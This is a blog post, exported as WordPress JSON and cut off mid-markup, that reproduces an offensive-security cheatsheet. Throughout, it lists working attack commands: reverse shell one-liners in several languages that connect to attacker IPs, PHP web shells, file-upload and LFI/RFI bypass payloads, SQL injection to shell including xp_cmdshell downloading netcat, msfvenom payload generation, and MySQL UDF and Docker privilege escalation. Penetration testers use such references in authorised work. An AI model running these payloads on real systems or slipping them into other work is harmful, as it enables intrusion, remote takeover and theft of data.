{"id":65,"date":"2020-06-19T21:25:02","date_gmt":"2020-06-19T19:25:02","guid":{"rendered":"https:\/\/whatifsecu.tech\/?p=65"},"modified":"2020-06-19T21:25:29","modified_gmt":"2020-06-19T19:25:29","slug":"65","status":"publish","type":"post","link":"https:\/\/whatifsecu.tech\/?p=65","title":{"rendered":"Offensive Security \/ PenTesting Cheatsheets"},"content":{"rendered":"\n<h1 class=\"wp-block-heading\"><\/h1>\n\n\n\n<h2 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#reconnaissance--enumeration\"><\/a>Reconnaissance \/ Enumeration<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#extracting-live-ips-from-nmap-scan\"><\/a>Extracting Live IPs from Nmap Scan<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">nmap 10.1.1.1 --open -oG scan-results; cat scan-results | grep \"\/open\" | cut -d \" \" -f 2 &gt; exposed-services-ips<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#simple-port-knocking\"><\/a>Simple Port Knocking<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">for x in 7000 8000 9000; do nmap -Pn \u2013host_timeout 201 \u2013max-retries 0 -p $x 1.1.1.1; done<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#dns-lookups-zone-transfers--brute-force\"><\/a>DNS lookups, Zone Transfers &amp; Brute-Force<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">whois domain.com\ndig {a|txt|ns|mx} domain.com\ndig {a|txt|ns|mx} domain.com @ns1.domain.com\nhost -t {a|txt|ns|mx} megacorpone.com\nhost -a megacorpone.com\nhost -l megacorpone.com ns1.megacorpone.com\ndnsrecon -d megacorpone.com -t axfr @ns2.megacorpone.com\ndnsenum domain.com\nnslookup -&gt; set type=any -&gt; ls -d domain.com\nfor sub in $(cat subdomains.txt);do host $sub.domain.com|grep \"has.address\";done<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#banner-grabbing\"><\/a>Banner Grabbing<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">nc -v $TARGET 80\ntelnet $TARGET 80\ncurl -vX $TARGET<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#nfs-exported-shares\"><\/a>NFS Exported Shares<\/h3>\n\n\n\n<p>List NFS exported shares. If &#8216;rw,no_root_squash&#8217; is present, upload and execute&nbsp;<a href=\"https:\/\/github.com\/mantvydasb\/Offensive-Security-Cheatsheets\/blob\/master\/sid-shell.c\">sid-shell<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">showmount -e 192.168.110.102\nchown root:root sid-shell; chmod +s sid-shell<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#kerberos-user-enumeration\"><\/a>Kerberos User Enumeration<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#http-brute-force--vulnerability-scanning\"><\/a>HTTP Brute-Force &amp; Vulnerability Scanning<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">target=10.0.0.1; gobuster -u http:\/\/$target -r -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,txt -t 150 -l | tee $target-gobuster\ntarget=10.0.0.1; nikto -h http:\/\/$target:80 | tee $target-nikto\ntarget=10.0.0.1; wpscan --url http:\/\/$target:80 --enumerate u,t,p | tee $target-wpscan-enum<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#rpc--netbios--smb\"><\/a>RPC \/ NetBios \/ SMB<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">rpcinfo -p $TARGET\nnbtscan $TARGET\n\n#list shares\nsmbclient -L \/\/$TARGET -U \"\"\n\n# null session\nrpcclient -U \"\" $TARGET\nsmbclient -L \/\/$TARGET\nenum4linux $TARGET<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#snmp\"><\/a>SNMP<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\"># Windows User Accounts\nsnmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.25\n\n# Windows Running Programs\nsnmpwalk -c public -v1 $TARGET 1.3.6.1.2.1.25.4.2.1.2\n\n# Windows Hostname\nsnmpwalk -c public -v1 $TARGET .1.3.6.1.2.1.1.5\n\n# Windows Share Information\nsnmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.3.1.1\n\n# Windows Share Information\nsnmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.27\n\n# Windows TCP Ports\nsnmpwalk -c public -v1 $TARGET4 1.3.6.1.2.1.6.13.1.3\n\n# Software Name\nsnmpwalk -c public -v1 $TARGET 1.3.6.1.2.1.25.6.3.1.2\n\n# brute-force community strings\nonesixtyone -i snmp-ips.txt -c community.txt\n\nsnmp-check $TARGET<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#smtp\"><\/a>SMTP<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">smtp-user-enum -U \/usr\/share\/wordlists\/names.txt -t $TARGET -m 150<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#gaining-access\"><\/a>Gaining Access<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#reverse-shell-one-liners\"><\/a>Reverse Shell One-Liners<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#bash\"><\/a>Bash<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">bash -i &gt;&amp; \/dev\/tcp\/10.0.0.1\/8080 0&gt;&amp;1<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#perl\"><\/a>Perl<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">perl -e 'use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"&gt;&amp;S\");open(STDOUT,\"&gt;&amp;S\");open(STDERR,\"&gt;&amp;S\");exec(\"\/bin\/sh -i\");};'<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#url-encoded-perl-linux\"><\/a>URL-Encoded Perl: Linux<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">echo%20%27use%20Socket%3B%24i%3D%2210.11.0.245%22%3B%24p%3D443%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2fbin%2fsh%20-i%22%29%3B%7D%3B%27%20%3E%20%2ftmp%2fpew%20%26%26%20%2fusr%2fbin%2fperl%20%2ftmp%2fpew<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#python\"><\/a>Python<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"\/bin\/sh\",\"-i\"]);'<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#php\"><\/a>PHP<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">php -r '$sock=fsockopen(\"10.0.0.1\",1234);exec(\"\/bin\/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3\");'<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#ruby\"><\/a>Ruby<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">ruby -rsocket -e'f=TCPSocket.open(\"10.0.0.1\",1234).to_i;exec sprintf(\"\/bin\/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d\",f,f,f)'<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#netcat-without--e-1\"><\/a>Netcat without -e #1<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">rm \/tmp\/f; mkfifo \/tmp\/f; cat \/tmp\/f | \/bin\/sh -i 2&gt;&amp;1 | nc 10.0.0.1 1234 &gt; \/tmp\/f<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#netcat-without--e-2\"><\/a>Netcat without -e #2<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">nc localhost 443 | \/bin\/sh | nc localhost 444\ntelnet localhost 443 | \/bin\/sh | telnet localhost 444<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#java\"><\/a>Java<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">r = Runtime.getRuntime(); p = r.exec([\"\/bin\/bash\",\"-c\",\"exec 5&lt;&gt;\/dev\/tcp\/10.0.0.1\/2002;cat &lt;&amp;5 | while read line; do \\$line 2&gt;&amp;5 &gt;&amp;5; done\"] as String[]); p.waitFor();<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#xterm\"><\/a>XTerm<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">xterm -display 10.0.0.1:1<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#jdwp-rce\"><\/a>JDWP RCE<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">print new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec(\"whoami\").getInputStream())).readLine())<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#working-with-restricted-shells\"><\/a>Working with Restricted Shells<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\"># rare cases\nssh bill@localhost ls -l \/tmp<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">nice \/bin\/bash<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#interactive-tty-shells\"><\/a>Interactive TTY Shells<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">\/usr\/bin\/expect sh<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">python -c \u2018import pty; pty.spawn(\u201c\/bin\/sh\u201d)\u2019\n# execute one command with su as another user if you do not have access to the shell. Credit to g0blin.co.uk\npython -c 'import pty,subprocess,os,time;(master,slave)=pty.openpty();p=subprocess.Popen([\"\/bin\/su\",\"-c\",\"id\",\"bynarr\"],stdin=slave,stdout=slave,stderr=slave);os.read(master,1024);os.write(master,\"fruity\\n\");time.sleep(0.1);print os.read(master,1024);'<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#uploadingposting-files-through-www-upload-forms\"><\/a>Uploading\/POSTing Files Through WWW Upload Forms<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\"># POST file\ncurl -X POST -F \"file=@\/file\/location\/shell.php\" http:\/\/$TARGET\/upload.php --cookie \"cookie\"\n\n# POST binary data to web form\ncurl -F \"field=&lt;shell.zip\" http:\/\/$TARGET\/upld.php -F 'k=v' --cookie \"k=v;\" -F \"submit=true\" -L -v<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#puting-file-on-the-webhost-via-put-verb\"><\/a>PUTing File on the Webhost via PUT verb<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">curl -X PUT -d '&lt;?php system($_GET[\"c\"]);?&gt;' http:\/\/192.168.2.99\/shell.php<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#generating-payload-pattern--calculating-offset\"><\/a>Generating Payload Pattern &amp; Calculating Offset<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">\/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_create.rb -l 2000\n\/usr\/share\/metasploit-framework\/tools\/exploit\/pattern_offset.rb -q $EIP_VALUE<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#bypassing-file-upload-restrictions\"><\/a>Bypassing File Upload Restrictions<\/h3>\n\n\n\n<ul class=\"wp-block-list\"><li>file.php -&gt; file.jpg<\/li><li>file.php -&gt; file.php.jpg<\/li><li>file.asp -&gt; file.asp;.jpg<\/li><li>file.gif (contains php code, but starts with string GIF\/GIF98)<\/li><li>00%<\/li><li>file.jpg with php backdoor in exif (see below)<\/li><li>.jpg -&gt; proxy intercept -&gt; rename to .php<\/li><\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#injecting-php-into-jpeg\"><\/a>Injecting PHP into JPEG<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">exiv2 -c'A \"&lt;?php system($_REQUEST['cmd']);?&gt;\"!' backdoor.jpeg\nexiftool \u201c-comment&lt;=back.php\u201d back.png<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#uploading-htaccess-to-interpret-blah-as-php\"><\/a>Uploading .htaccess to interpret .blah as .php<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>AddType application\/x-httpd-php .blah\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#cracking-passwords\"><\/a>Cracking Passwords<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#cracking-web-forms-with-hydra\"><\/a>Cracking Web Forms with Hydra<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">hydra 10.10.10.52 http-post-form -L \/usr\/share\/wordlists\/list \"\/endpoit\/login:usernameField=^USER^&amp;passwordField=^PASS^:unsuccessfulMessage\" -s PORT -P \/usr\/share\/wordlists\/list<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#cracking-common-protocols-with-hydra\"><\/a>Cracking Common Protocols with Hydra<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">hydra 10.10.10.52 -l username -P \/usr\/share\/wordlists\/list ftp|ssh|smb:\/\/10.0.0.1<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#hashcat-cracking\"><\/a>HashCat Cracking<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\"># Bruteforce based on the pattern;\nhashcat -a3 -m0 mantas?d?d?d?u?u?u --force --potfile-disable --stdout  \n\n# Generate password candidates: wordlist + pattern;\nhashcat -a6 -m0 \"e99a18c428cb38d5f260853678922e03\" yourPassword|\/usr\/share\/wordlists\/rockyou.txt ?d?d?d?u?u?u --force --potfile-disable --stdout<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#generating-payload-with-msfvenom\"><\/a>Generating Payload with msfvenom<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">msfvenom -p windows\/shell_reverse_tcp LHOST=10.11.0.245 LPORT=443 -f c -a x86 --platform windows -b \"\\x00\\x0a\\x0d\" -e x86\/shikata_ga_nai<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#compiling-code-from-linux\"><\/a>Compiling Code From Linux<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\"># Windows\ni686-w64-mingw32-gcc source.c -lws2_32 -o out.exe\n\n# Linux\ngcc -m32|-m64 -o output source.c<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#local-file-inclusion-to-shell\"><\/a>Local File Inclusion to Shell<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">nc 192.168.1.102 80\nGET \/&lt;?php passthru($_GET['cmd']); ?&gt; HTTP\/1.1\nHost: 192.168.1.102\nConnection: close\n\n# Then send as cmd payload via http:\/\/192.168.1.102\/index.php?page=..\/..\/..\/..\/..\/var\/log\/apache2\/access.log&amp;cmd=id<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#local-file-inclusion-reading-files\"><\/a>Local File Inclusion: Reading Files<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">file:\/\/\/etc\/passwd\n\nhttp:\/\/example.com\/index.php?page=php:\/\/input&cmd=ls\n    POST: &lt;?php system($_GET['cmd']); ?&gt;\nhttp:\/\/192.168.2.237\/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp:\/\/input\n    POST: &lt;?php system('uname -a');die(); ?&gt;\n\nexpect:\/\/whoami\nhttp:\/\/example.com\/index.php?page=php:\/\/filter\/read=string.rot13\/resource=index.php\nhttp:\/\/example.com\/index.php?page=php:\/\/filter\/convert.base64-encode\/resource=index.php\nhttp:\/\/example.com\/index.php?page=php:\/\/filter\/zlib.deflate\/convert.base64-encode\/resource=\/etc\/passwd\nhttp:\/\/example.net\/?page=data:\/\/text\/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=&cmd=id\nhttp:\/\/10.1.1.1\/index.php?page=data:\/\/text\/plain,%3C?php%20system%28%22uname%20-a%22%29;%20?%3E\n\n# ZIP Wrapper\necho \"&lt;pre&gt;&lt;?php system($_GET['cmd']); ?&gt;&lt;\/pre&gt;\" &gt; payload.php;  \nzip payload.zip payload.php;   \nmv payload.zip shell.jpg;    \nhttp:\/\/example.com\/index.php?page=zip:\/\/shell.jpg%23payload.php\n\n# Loop through file descriptors\ncurl '' -H 'Cookie: PHPSESSID=df74dce800c96bcac1f59d3b3d42087d' --output -<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#remote-file-inclusion-shell-windows--php\"><\/a>Remote File Inclusion Shell: Windows + PHP<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php system(\"powershell -Command \\\"&amp; {(New-Object System.Net.WebClient).DownloadFile('http:\/\/10.11.0.245\/netcat\/nc.exe','nc.exe'); cmd \/c nc.exe 10.11.0.245 4444 -e cmd.exe\\\" }\"); ?&gt;<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#sql-injection-to-shell-or-backdoor\"><\/a>SQL Injection to Shell or Backdoor<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\"># Assumed 3 columns\nhttp:\/\/target\/index.php?vulnParam=0' UNION ALL SELECT 1,\"&lt;?php system($_REQUEST['cmd']);?&gt;\",2,3 INTO OUTFILE \"c:\/evil.php\"-- uMj<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\"># sqlmap; post-request - captured request via Burp Proxy via Save Item to File.\nsqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\"># netcat reverse shell via mssql injection when xp_cmdshell is available\n1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+&gt;+c:\\ftp.txt+%26+ftp+-s:c:\\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#sqlite-injection-to-shell-or-backdoor\"><\/a>SQLite Injection to Shell or Backdoor<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">ATTACH DATABASE '\/home\/www\/public_html\/uploads\/phpinfo.php' as pwn; \nCREATE TABLE pwn.shell (code TEXT); \nINSERT INTO pwn.shell (code) VALUES ('&lt;?php system($_REQUEST['cmd']);?&gt;');<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#ms-sql-console\"><\/a>MS-SQL Console<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">mssqlclient.py -port 27900 user:password@10.1.1.1\nsqsh -S 10.1.1.1 -U user -P password<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#upgradig-non-interactive-shell\"><\/a>Upgradig Non-Interactive Shell<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">python -c 'import pty; pty.spawn(\"\/bin\/sh\")'\n\/bin\/busybox sh<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#python-input-code-injection\"><\/a>Python Input Code Injection<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">__import__('os').system('id')<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#local-enumeration--privilege-escalation\"><\/a>Local Enumeration &amp; Privilege Escalation<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#binary-exploitation-with-immunitydebugger\"><\/a>Binary Exploitation with ImmunityDebugger<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#get-loaded-modules\"><\/a>Get Loaded Modules<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code># We're interested in modules without protection, Read &amp; Execute permissions\n!mona modules\n<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#finding-jmp-esp-address\"><\/a>Finding JMP ESP Address<\/h4>\n\n\n\n<pre class=\"wp-block-code\"><code>!mona find -s \"\\xFF\\xE4\" -m moduleName\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#cracking-a-zip-password\"><\/a>Cracking a ZIP Password<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">fcrackzip -u -D -p \/usr\/share\/wordlists\/rockyou.txt bank-account.zip<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#setting-up-simple-http-server\"><\/a>Setting up Simple HTTP server<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\"># Linux\npython -m SimpleHTTPServer 80\npython3 -m http.server\nruby -r webrick -e \"WEBrick::HTTPServer.new(:Port =&gt; 80, :DocumentRoot =&gt; Dir.pwd).start\"\nphp -S 0.0.0.0:80<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#mysql-user-defined-fuction-privilge-escalation\"><\/a>MySQL User Defined Fuction Privilge Escalation<\/h3>\n\n\n\n<p>Requires&nbsp;<a href=\"https:\/\/github.com\/mantvydasb\/Offensive-Security-Cheatsheets\/blob\/master\/raptor_udf2.c\">raptor_udf2.c<\/a>&nbsp;and&nbsp;<a href=\"https:\/\/github.com\/mantvydasb\/Offensive-Security-Cheatsheets\/blob\/master\/sid-shell.c\">sid-shell.c<\/a>&nbsp;or&nbsp;<a href=\"https:\/\/github.com\/mantvydasb\/Offensive-Security-Cheatsheets\/blob\/master\/raptor\/raptor.tar\">full tarball<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc<\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>use mysql;\ncreate table npn(line blob);\ninsert into npn values(load_file('\/tmp\/raptor_udf2.so'));\nselect * from npn into dumpfile '\/usr\/lib\/raptor_udf2.so';\ncreate function do_system returns integer soname 'raptor_udf2.so';\nselect do_system('chown root:root \/tmp\/sid-shell; chmod +s \/tmp\/sid-shell');\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#docker-privilege-esclation\"><\/a>Docker Privilege Esclation<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">echo -e \"FROM ubuntu:14.04\\nENV WORKDIR \/stuff\\nRUN mkdir -p \/stuff\\nVOLUME [ \/stuff ]\\nWORKDIR \/stuff\" &gt; Dockerfile &amp;&amp; docker build -t my-docker-image . &amp;&amp; docker run -v $PWD:\/stuff -t my-docker-image \/bin\/sh -c 'cp \/bin\/sh \/stuff &amp;&amp; chown root.root \/stuff\/sh &amp;&amp; chmod a+s \/stuff\/sh' &amp;&amp; .\/sh -c id &amp;&amp; .\/sh<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#resetting-root-password\"><\/a>Resetting root Password<\/h3>\n\n\n\n<pre class=\"wp-block-preformatted\">echo \"root:spotless\" | chpasswd<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#uploading-files-to-target-machine\"><\/a>Uploading Files to Target Machine<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#tftp\"><\/a>TFTP<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">#TFTP Linux: cat \/etc\/default\/atftpd to find out file serving location; default in kali \/srv\/tftp\nservice atftpd start\n\n# Windows\ntftp -i $ATTACKER get \/download\/location\/file \/save\/location\/file<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#ftp\"><\/a>FTP<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\"># Linux: set up ftp server with anonymous logon access;\ntwistd -n ftp -p 21 -r \/file\/to\/serve\n\n# Windows shell: read FTP commands from ftp-commands.txt non-interactively;\necho open $ATTACKER&gt;ftp-commands.txt\necho anonymous&gt;&gt;ftp-commands.txt\necho whatever&gt;&gt;ftp-commands.txt\necho binary&gt;&gt;ftp-commands.txt\necho get file.exe&gt;&gt;ftp-commands.txt\necho bye&gt;&gt;ftp-commands.txt \nftp -s:ftp-commands.txt\n\n# Or just a one-liner\n(echo open 10.11.0.245&amp;echo anonymous&amp;echo whatever&amp;echo binary&amp;echo get nc.exe&amp;echo bye) &gt; ftp.txt &amp; ftp -s:ftp.txt &amp; nc.exe 10.11.0.245 443 -e cmd<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#php-1\"><\/a>PHP<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php file_put_contents(\"\/var\/tmp\/shell.php\", file_get_contents(\"http:\/\/10.11.0.245\/shell.php\")); ?&gt;<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/Prodject\/Offensive-Security-Cheatsheets#python-1\"><\/a>Python<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">python -c \"from urllib import urlretrieve; urlretrieve('http:\/\/10.11.0.245\/nc.exe', 'C:\\\\Temp\\\\nc.exe')\"<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a 